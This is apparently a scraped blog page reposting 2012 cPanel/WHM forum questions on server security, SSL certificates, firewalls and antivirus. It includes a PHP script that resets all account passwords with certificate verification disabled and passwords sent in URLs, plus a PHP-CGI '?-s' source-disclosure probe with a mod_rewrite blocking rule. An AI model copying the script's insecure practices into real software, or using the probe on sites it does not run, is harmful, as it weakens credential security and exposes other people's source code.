Is it possible have custom suhosin setting per domain or user account ?
server : fcgi
Thank you
Suhosin : custom setting Per user account
[Cpanel Blog] CSF and Google bots ??? May,2012
[Cpanel Blog] specific rule on modsecurity to scan any uploaded file May,2012
Hello mate,
I am searching about specific rule lines for scanning any uploaded file via any scripts such as vb or wordpress ,etc
I want modsecurity rule to scan any uploaded file with my custom Anti-Virus script
Can any one provide me one???
as know the version of modsecurity nowadays on cpanel servers is 2.6.3
Thank you in advance
specific rule on modsecurity to scan any uploaded file
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
[Cpanel Blog] Change All Cpanel User Passwords May,2012
Hello All,
My server was recently compromised by a hacker which installed some malware on the server, and after cleaning up, I wanted to change all users passwords on the server since many of them had be compromised. I searched around and it came down to I needed to use the api to do this couldn't find any scripts, so I took the time and throw a quick php script together to get the job done.
Hope this helps someone
You can change the password length by changing the number in this function call $pass = random_gen(12);
And you can run the code and save the passwords by doing
Code: php nameofscript.php > newpasswords.csv
PHP Code: <?
$whmusername = "root";
$whmpassword = "password";
$domain = "domain.com";
$query = "https://".$domain.":2087/json-api/listaccts";
$curl = curl_init();
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$header[0] = "Authorization: Basic " . base64_encode($whmusername.":".$whmpassword) . "\n\r";
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_URL, $query);
$result = curl_exec($curl);
if ($result == false)
{
error_log("curl_exec threw error \"" . curl_error($curl) . "\" for $query");
}
curl_close($curl);
$result = json_decode($result);
foreach ($result->acct as $acct)
{
$user = $acct->user;
$pass = random_gen(12);
$query2 = "https://".$domain.":2087/json-api/passwd?user=".$user."&pass=".$pass;
$curl2 = curl_init();
curl_setopt($curl2, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl2, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl2, CURLOPT_HEADER,0);
curl_setopt($curl2, CURLOPT_RETURNTRANSFER,1);
$header[0] = "Authorization: Basic " . base64_encode($whmusername.":".$whmpassword) . "\n\r";
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_URL, $query2);
$result2 = curl_exec($curl2);
curl_close($curl2);
$result2 = json_decode($result2);
if($result2->passwd[0]->status == 1)
{
echo '"'.$user.'","'.$pass.'"'."\n";
}
}
function random_gen($length)
{
$random= "";
srand((double)microtime()*1000000);
$char_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$char_list .= "abcdefghijklmnopqrstuvwxyz";
$char_list .= "1234567890";
$char_list .= "!@#$%^*";
// Add the special characters to $char_list if needed
for($i = 0; $i < $length; $i++)
{
$random .= substr($char_list,(rand()%(strlen($char_list))), 1);
}
return $random;
}
?>
Change All Cpanel User Passwords
Cpanel Blog Installing a UCC SSL Cert May,2012
Sabtu, 12 Mei 2012
[Cpanel Blog] Is it neccessary to setup manual clam scan? May,2012
Hi;
We have configured ClamAv scanner (global setting) via WHM to scan:
Entire home directory
Mail
Public FTP space
Public web space
My questions:
With these settings configured is it neccessay to cron a scan of /home or / ? Or can I rest assure that what we have is sufficient?
Where do I configure ClamAv to E-mail the administrator if it finds any suspected files?
Thanks in advance
Is it neccessary to setup manual clam scan?
Cpanel Blog can't access our website May,2012
[Cpanel Blog] Large Number of Failed Login Attempts from IP ... - auto blacklist? May,2012
I am getting email often with "Large Number of Failed Login Attempts from IP ..." and options to block or white list. Can t automatically block it without me clicking link and logging in to website?
Code: 5 failed login attempts to account admin (system) -- Large number of attempts from this IP: 221.128.103.20
Reverse DNS: tot-103-20.pacific.net.th
Origin Country: Thailand (TH)
Please use the following links to add to the black list:
Single Ip: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.103.20
/24: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.103.0/24
/16: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.0.0/16
Please use the following links to add to the white list:
Single Ip: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/wl.cgi?ip=221.128.103.20
/24: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/wl.cgi?ip=221.128.103.0/24
/16: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/wl.cgi?ip=221.128.0.0/16 P.S. what means /24 and /16?
Large Number of Failed Login Attempts from IP ... - auto blacklist?
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
Kamis, 10 Mei 2012
[Cpanel Blog] CSF and Google bots ??? May,2012
Hello Every one,
Since i am using CSF on my server, my clients are complaining that their google rankings are coming down as Google cannot communicate to the domains on the server and this is what it has to say :-
URLs timed out - Network availability of your DNS and web servers
I need to know how can i white list Google bots in CSF so that this issue gets addressed ??
This is what Google has to say :
Google doesn't post a public list of IP addresses for webmasters to whitelist. This is because these IP address ranges can change, causing problems for any webmasters who have hard coded them. The best way to identify accesses by Googlebot is to use the user-agent (Googlebot).
Hence, How can we add Googlebot to CSF ?
Please assist !!!!
CSF and Google bots ???
[Cpanel Blog] Beast TLS Vulnerability May,2012
Selasa, 08 Mei 2012
[Cpanel Blog] Beast TLS Vulnerability May,2012
I did some searching, and I can't find any cPanel references for this vulnerability. Will the fix below work with cPanel?
Mitigating the BEAST attack on TLS
This is the vulnerability information from McAfee Secure:
Quote: SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability
A vulnerability exists in SSL 3.0 and TLS 1.0 that could allow information disclosure if an attacker intercepts encrypted traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected. This script tries to establish an SSL/TLS remote connection using an affected SSL version and cipher suite, and then solicits return data. If returned application data is not fragmented with an empty or one-byte record, it is likely vulnerable. OpenSSL uses empty fragments as a countermeasure unless the 'SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS' option is specified when OpenSSL is initialized. Microsoft implemented one-byte fragments as a countermeasure, and the setting can be controlled via the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\SendExtraRecord. Therefore, if multiple applications use the same SSL/TLS implementation, some may be vulnerable while others may not, depending on whether or not a countermeasure has been enabled. Note that this script detects the vulnerability in the SSLv3/TLSv1 protocol implemented in the server. It does not detect the BEAST attack where it exploits the vulnerability at HTTPS client-side (i.e., Internet browser). The detection at server-side does not necessarily means your server is vulnerable to the BEAST attack because the attack exploits the vulnerability at client-side, and both SSL/TLS clients and servers can independently employ the split record countermeasure.
Configure SSL/TLS servers to only use TLS 1.1 or TLS 1.2 if supported. Configure SSL/TLS servers to only support cipher suites that do not use block ciphers. Apply patches if available.
Beast TLS Vulnerability
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
[Cpanel Blog] reporting abuse proceedure? May,2012
Two questions:
1. What's the standard procedure for reporting abuse, i.e. another IP just hammering your box? I can get the abuse email (usually) from a whois on the IP - is there a better way? After getting the correct abuse email, what should typically be contained in the email?
2. Is there any way to get cphulk to automatically fire off abuse emails when an IP repeatedly triggers it?
Thanks!
reporting abuse proceedure?
Cpanel Blog Strange email with attachment from "cpanel" May,2012
Senin, 07 Mei 2012
Cpanel Blog PHP 5.3.12 Security Vulnerability Patch May,2012
Can we please get PHP 5.3.12 released into easyapache..
There is a vulnerability in certain CGI-based setups (Apache+mod_php and nginx+php-fpm are not affected) that has gone unnoticed for at least 8 years. Section 7 of the CGI spec states:
Some systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded "=" characters.
So, requests that do not have a "=" in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&=1 is fine.
A large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable.
If you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.
To fix this, update to PHP 5.3.12 or PHP 5.4.2.
We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP. An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:
Code: RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L] If you are writing your own rule, be sure to take the urlencoded ?%2ds version into account.
PHP 5.3.12 Security Vulnerability Patch
Cpanel Blog can't access our website May,2012
Hi guys,
Am new here so please bear with me.
i am not sure if it's a problem with csf/lfd but the problem is,
access to our website is erratic.
it goes on and off every once and will take as long as 30minutes - 1 hour before it comes back again
unless i restart the csf/lfd.
i checked the logs everytime the access goes down and says that
there is a failed login to the cpanel.
access gets blocked even though i already added our IP to the whitelist and the ignorelist.
can anybody assist me with this please...
been having the problem for two weeks now...
please any ideas will be greatly appreaciated...
Thanks in advance.
can't access our website
Cpanel Blog Strange email with attachment from "cpanel" May,2012
Hello forum members -
I've had a server leased from a reputable cPanel partner for almost 2 years now. For the first time ever, I received an email apparently from cPanel with the following identifying information in the header:
<cpanel@host.servername.net>
Backup complete on host.servername.net
Received: from root by host.servername.net
(envelope-from <root@host.servername..net>)
for myname@sbcglobal.net; Wed, 02 May 2012 01:11:22 -0500
To: myname@sbcglobal.net
From: cpanel@host.servername.net
Subject: [cpbackup] Backup complete on host.servername.net
There was an attachment to the message: filenumber.log.txt
The message seems legitimately from cPanel, but as I say, I've never had one before, and have not opened the attachment for security concerns.
Should I be worried?
Best wishes
Strange email with attachment from "cpanel"
Minggu, 06 Mei 2012
Cpanel Blog Installing a UCC SSL Cert May,2012
We're running an Apache virtual server on Linux. WHM/cPanel is installed on top of that. I was reading past entries that talked about the issues installing a goDaddy UCC through WHM. My question is has anyone ever installed the UCC manually in Apache and by-passed using WHM to install the cert? My thought is that if the UCC were installed through Apache that the need to do the multi-step installs can be avoided. Has anyone done this? How did it workout?
Thanks!
Installing a UCC SSL Cert
Cpanel Blog Directing http to https May,2012
Hi
How can I direct visitng my domain www.mydomain.com to https://www.mydomain.com all the time?
I have a valid SSL for my domain with www. subdomain
Thank you
Directing http to https
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012
I finally went with a 64bit server (as opposed to 32bit), and now I can't seem to get lcap installed properly.
Here's the result of running uname -mrs
Linux 2.6.32-220.13.1.el6.x86_64 x86_64
I found what I believe to be the correct RPM here:
195.220.108.108/linux/dag/redhat/el6/en/x86_64/rpmforge/RPMS/lcap-0.0.6-6.2.el6.rf.x86_64.rpm
After downloading the rpm I install it with this:
rpm -Uvh lcap-0.0.6-6.2.el6.rf.x86_64.rpm
And I get what appears to be the normal output with the above.
But then, upon running this:
lcap CAP_SYS_PTRACE
I get this:
/proc/sys/kernel/cap-bound: No such file or directory
And sure enough, there is no cap-bound like there is on all the other cPanel servers where I have installed lcap installation.
Anyone know what may be the problem with this?
Thanks very much!
Trouble installing LCAP on new 64bit server.
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
Hello,
We have a CentOS (Linux) based web server which hosts multiple domains on single IP (Virtual Hosts) and managed through WHM/Cpanel. We are in need to install SAN SSL certificate (Purchased from Trustwave) for 5 domains hosted on the server. Can you please provide me step by step procedure to install/configure the above said through WHM/CPanal.?
Any help in this regard will be highly appreciated.
Thanks in Advance.
Suresh.
Intsalling SAN SSL Certificate
Sabtu, 05 Mei 2012
Cpanel Blog A-List or A-Record May,2012
Hello there,
Can you please inform me how to make the SSL certificate work for both www.domain.com and domain.com at the same time? is it better to have it for www.domain.com or for domain.com?
I have been told that it is good idea to make an A-record from the DNS area, I am not sure how to do that. From DNS I clicked on Add an A entry to your hostname and I received this message
Adding an A entry for your hostname
Adding A Entry...Bind reloading on vdc using rndc zone: [xxxx.com]
...Done
I appreciate your help.
A-List or A-Record
Cpanel Blog How to force secure login to _private folder? May,2012
During my latest PCI Compliance scan, one vulnerability that came up was that "web application transmits login credentials without encryption". The two examples it gave were:
http://www.domain.com/_private/
http://0.0.0.0/_private/
In WHM, I have the following security settings in place:
Require SSL: On
Enable HTTP Authentication: Off
I tried to use the following code in the .htaccess file in the _private folder, but it did not work:
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} _private
RewriteRule ^(.*)$ https://www.domain.com/_private/$1 [R,L]
Can anyone tell me how to force SSL when accessing the _private folder from a browser?
How to force secure login to _private folder?
Cpanel Blog Disable wildcard subdomain May,2012
There is an option (way) to disable wildcard subdomain creation, like *.domain.com ?
I don't know if I am in the good forum.
Regards
Disable wildcard subdomain
Cpanel Blog Root logins from single unknown IP - what next steps, suspicious changes May,2012
Hi,
We have had root logins from an unknown IP a few times in the last few hours. Nothing seems to have been changed or damaged. This one was not a brute force attempt. So it could be someone in the organisation, legitimately logging in, but finding out who takes time in a company - and some damage can be done by then.
The damage could be insidious, hidden - installation of some rogue software / script / etc.
1. First thing I did was to change the root password.
2. Next, I plan to install and run rkhunter (which, yes, wasn't installed, so my bad). I have read that if root is compromised then a worst case scenario is that system binaries and even an installed rkhunter can be compromised/modified. So luckily in that sense, rkhunter is now reliable ;)
3. I have CSF+LFD running which is how I found out in the first place.
But the interesting thing is that in CSF, there is the option LF_INTEGRITY which I *definitely* had set to enabled, and it now shows the red "Warning" message.
I had to put CSF back into "Testing" mode for a while - does this disable LF_INTEGRITY checking automatically?
PT_SKIP_HTTP and PT_ALL_USERS are also not in force ("Warning")
Do these three have to re-enabled every time when setting Testing to 0?
4. Brute force login attempts from rogue IP ranges is a very common daily occurrence with us now. CpHulk seems to discourage those fairly well (30 tries = banned for 15 days)
We have, of course, backed up everything offline.
Any other suggestions?
Thanks in advance,
Dave
Root logins from single unknown IP - what next steps, suspicious changes
Cpanel Blog Globalsign OneClickSSL WHM/cPanel Addon Not Working May,2012
I have a ticket open with my host and with globalsign, but you guys are the smart ones... anyone else having issues with the latest whm/cpanel upgrade killing their Globalsign OneClickSSL addon?
Is anyone's working properly on whm 11.32.2 (build 25)
Globalsign OneClickSSL WHM/cPanel Addon Not Working
Langganan:
Komentar (Atom)